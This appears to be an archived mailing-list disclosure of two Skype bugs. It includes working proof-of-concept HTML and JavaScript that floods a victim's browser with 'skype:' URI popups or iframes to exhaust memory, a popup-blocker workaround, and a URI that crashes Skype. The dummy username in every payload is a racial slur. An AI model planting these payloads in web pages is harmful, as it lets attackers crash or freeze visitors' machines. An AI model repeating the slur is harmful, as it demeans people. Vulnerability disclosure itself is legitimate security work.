<<< Date Index >>>     <<< Thread Index >>>

Skype DoS



1. Skype and Internet Explorer uri handler mechanism memory resources 
consumption bug:

<script>
for (var x = 1; x <= 666; x++)
{
popup_window = window.open('skype:happy_negro?call');
popup_window.close ();
}
</script>

This will invoke many skype.exe processes and as they are not closed - much 
memory will be consumed. Such script will be blocked by popup blocker, so it is 
possible to do it other way:

<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>
... I've used about megabyte of such crap
<iframe src="skype:happy_negro?call"></iframe><iframe 
src="skype:happy_negro?call"></iframe>

Tested on IE7, WinXP SP2 and skype 3.6.0.216

2. Unexploitable Skype null pointer dereference:

skype:?voicemail

To trigger the bug a right mouse button must be clicked, or menu button 
selected. Skype should crash :)

Found here: http://www.critical.lt/?opinions/show/1433
credits: Critical Security